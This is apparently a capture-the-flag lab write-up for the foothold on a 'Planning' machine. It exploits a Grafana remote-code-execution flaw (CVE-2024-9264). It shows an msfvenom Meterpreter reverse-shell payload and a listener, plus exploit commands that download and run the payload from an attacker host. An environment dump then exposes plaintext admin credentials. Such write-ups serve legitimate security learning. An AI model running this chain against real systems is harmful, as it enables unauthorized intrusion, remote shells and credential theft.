Foothold

GitHub - nollium/CVE-2024-9264: Exploit for Grafana arbitrary file-read and RCE (CVE-2024-9264)GitHub

❯ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=4443 -f elf > shell.elf

[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes

❯ msfconsole -q -x 'use exploit/multi/handler;set payload linux/x64/meterpreter/reverse_tcp;set LHOST tun0; set LPORT 4443; run'
[*] Using configured payload generic/shell_reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
LHOST => tun0
LPORT => 4443
[*] Started reverse TCP handler on 10.10.14.3:4443

❯ python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r  -c 'wget http://10.10.14.3/shell.elf' http://grafana.planning.htb
[+] Logged in as admin:0D5oT70Fq13EvB5r
[+] Executing command: wget http://10.10.14.3/shell.elf
[+] Successfully ran duckdb query:
[+] SELECT 1;install shellfs from community;LOAD shellfs;SELECT * FROM read_csv('wget
http://10.10.14.3/shell.elf >/tmp/grafana_cmd_output 2>&1 |'):
[+] Successfully ran duckdb query:
[+] SELECT content FROM read_blob('/tmp/grafana_cmd_output'):
--2025-06-07 01:46:21--  http://10.10.14.3/shell.elf
Connecting to 10.10.14.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 250 [application/octet-stream]
Saving to: 'shell.elf'

     0K                                                       100% 26.2K=0.009s

2025-06-07 01:46:21 (26.2 KB/s) - 'shell.elf' saved [250/250]

❯ python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r  -c 'chmod +x shell.elf' http://grafana.planning.htb
[+] Logged in as admin:0D5oT70Fq13EvB5r
[+] Executing command: chmod +x shell.elf
[+] Successfully ran duckdb query:
[+] SELECT 1;install shellfs from community;LOAD shellfs;SELECT * FROM read_csv('chmod +x
shell.elf >/tmp/grafana_cmd_output 2>&1 |'):
[+] Successfully ran duckdb query:
[+] SELECT content FROM read_blob('/tmp/grafana_cmd_output'):

❯ python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r  -c './shell.elf' http://grafana.planning.htb
[+] Logged in as admin:0D5oT70Fq13EvB5r
[+] Executing command: ./shell.elf
⠸ Running duckdb query

We clearly inna Docker Container lol

Shell was wonky so ran the following using the exploit

❯ python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r  -c 'env' http://grafana.planning.htb
[+] Logged in as admin:0D5oT70Fq13EvB5r
[+] Executing command: env
[+] Successfully ran duckdb query:
[+] SELECT 1;install shellfs from community;LOAD shellfs;SELECT * FROM
read_csv('env >/tmp/grafana_cmd_output 2>&1 |'):
[+] Successfully ran duckdb query:
[+] SELECT content FROM read_blob('/tmp/grafana_cmd_output'):
GF_PATHS_HOME=/usr/share/grafana
HOSTNAME=7ce659d667d7
SHLVL=0
AWS_AUTH_EXTERNAL_ID=
HOME=/usr/share/grafana
AWS_AUTH_AssumeRoleEnabled=true
GF_PATHS_LOGS=/var/log/grafana
GF_PATHS_PROVISIONING=/etc/grafana/provisioning
GF_PATHS_PLUGINS=/var/lib/grafana/plugins
PATH=/usr/local/bin:/usr/share/grafana/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
AWS_AUTH_AllowedAuthProviders=default,keys,credentials
GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!
AWS_AUTH_SESSION_DURATION=15m
GF_SECURITY_ADMIN_USER=enzo
GF_PATHS_DATA=/var/lib/grafana
GF_PATHS_CONFIG=/etc/grafana/grafana.ini
AWS_CW_LIST_METRICS_PAGE_LIMIT=500
PWD=/usr/share/grafana

Creds 🍩

enzo:RioTecRANDEntANT!

Previous80 NextPriv Esc

Last updated 8 months ago